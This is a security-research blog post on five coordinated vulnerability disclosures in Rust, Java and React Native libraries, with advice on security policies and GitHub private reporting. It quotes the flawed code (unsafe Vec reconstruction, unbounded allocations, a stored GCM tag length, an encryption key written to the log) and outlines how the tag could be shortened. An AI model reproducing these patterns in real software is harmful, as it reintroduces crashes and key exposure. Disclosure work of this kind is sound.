By Max Ammann
This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes.
Here are the five bugs:
- Undefined behavior in the
borsh-rs
Rust library - Denial-of-service (DoS) vector in Rust libraries for parsing the Ethereum ABI
- Missing limit on authentication tag length in Expo
- DoS vector in the
num-bigint
Rust library - Insertion of MMKV database encryption key into Android system log with
react-native-mmkv
Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.
In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
- Discreet and secure alerts to developers: no need for PGP-encrypted emails
- Streamlined process: no playing hide-and-seek with company email addresses
- Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.
Case 1: Undefined behavior in borsh-rs Rust library
The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs
that was not fixed for two years.
During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy
trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug.
The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.
I reached out to the borsh-rs
developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed.
The following code contained the bug that caused undefined behavior:
impl<T> BorshDeserialize for Vec<T> where T: BorshDeserialize, { #[inline] fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> { let len = u32::deserialize(reader)?; if size_of::<T>() == 0 { let mut result = Vec::new(); result.push(T::deserialize(reader)?); let p = result.as_mut_ptr(); unsafe { forget(result); let len = len as usize; let result = Vec::from_raw_parts(p, len, len); Ok(result) } } else { // TODO(16): return capacity allocation when we can safely do that. let mut result = Vec::with_capacity(hint::cautious::<T>(len)); for _ in 0..len { result.push(T::deserialize(reader)?); } Ok(result) } } }
Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150)
The code in figure 1 deserializes bytes to a vector of some generic data type T
. If the type T
is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32
. After that, the code allocates an empty Vec
type. Then it pushes a single instance of T
into it. Later, it temporarily leaks the memory of the just-allocated Vec
by calling the forget
function and reconstructs it by setting the length and capacity of Vec
to the requested length. As a result, the unsafe Rust code assumes that T
is copyable.
The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.
Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI
In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties.
The bug affected four GitHub-hosted projects. Only the Python project eth_abi
had GitHub private reporting enabled. For the other three projects (ethabi
, alloy-rs
, and ethereumjs-abi
), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch
to GitHub commit URLs. The following link shows the non-work email address I used for committing:
https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README
file would streamline communication and reduce effort.
Read more about the technical details of this bug in the blog post Billion times emptiness.
Case 3: Missing limit on authentication tag length in Expo
In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store
. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.
When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, [email protected]
, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.
Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had.
Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher
class and are stored with the ciphertext:
/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException { byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8); byte[] ciphertextBytes = cipher.doFinal(plaintextBytes); String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP); String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP); int authenticationTagLength = gcmSpec.getTLen(); JSONObject result = new JSONObject() .put(CIPHERTEXT_PROPERTY, ciphertext) .put(IV_PROPERTY, ivString) .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength); postEncryptionCallback.run(promise, result); return result; }
Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java)
For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.
An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.
From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.
The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.
The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately.
Case 4: DoS vector in the num-bigint Rust library
In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint
Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.
The num-bigint
project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint
by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear.
But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128
. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails.
The num-bigint
types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode
crate. The following example program shows how to use this deserialization feature:
use num_bigint::BigUint; use std::io::Read; fn main() -> std::io::Result<()> { let mut buf = Vec::new(); let _ = std::io::stdin().read_to_end(&mut buf)?; let _: BigUint = bincode::deserialize(&buf).unwrap_or_default(); Ok(()) }
Figure 3: Example deserialization format
It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor
trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory
allocation
of
2893606913523067072
bytes
failed
.
impl<'de> Visitor<'de> for U32Visitor { type Value = BigUint; {...omitted for brevity...} #[cfg(not(u64_digit))] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { let len = seq.size_hint().unwrap_or(0); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } #[cfg(u64_digit)] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { use crate::big_digit::BigDigit; use num_integer::Integer; let u32_len = seq.size_hint().unwrap_or(0); let len = Integer::div_ceil(&u32_len, &2); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } }
Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108)
We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1
on August 22, 2023. The fixed version was released the next day as 0.4.4.
Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv
The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv
library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark.
During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv
library caught my attention. The following code shows the problematic log statement:
MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path, std::string cryptKey) { __android_log_print(ANDROID_LOG_INFO, "RNMMKV", "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)", instanceId.c_str(), path.c_str(), cryptKey.c_str()); std::string* pathPtr = path.size() > 0 ? &path : nullptr; {...omitted for brevity...}
Figure 5: Code that initializes MMKV and also logs the encryption key
Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.
With the client’s agreement, I notified the author of react-native-mmkv
, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv
when running npm
audit
or npm
install
.
This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm
audit
command is to create a GitHub advisory. Using private reporting streamlines that process.
Takeaways
GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).
The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls.
However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.
Step 1: Add a security policy
Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.
GitHub has two ways to publish a security policy. Either you can create a SECURITY.md
file in the repository root, or you can create a user- or organization-wide policy by creating a .github
repository and putting a SECURITY.md
file in its root.
We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:
We have multiple channels for receiving reports:
* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to [email protected]
Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.
Step 2: Enable private reporting
Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.
Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require.
After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”:
Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this:
If you want to enable private reporting for your whole organization, then check out this documentation.
A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically.
On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.
This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.
Step 3: Get notifications via webhooks
If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type:
After creating the webhook, repository_advisory
events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability.
How to make security researchers happy
If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day.
If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.
If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.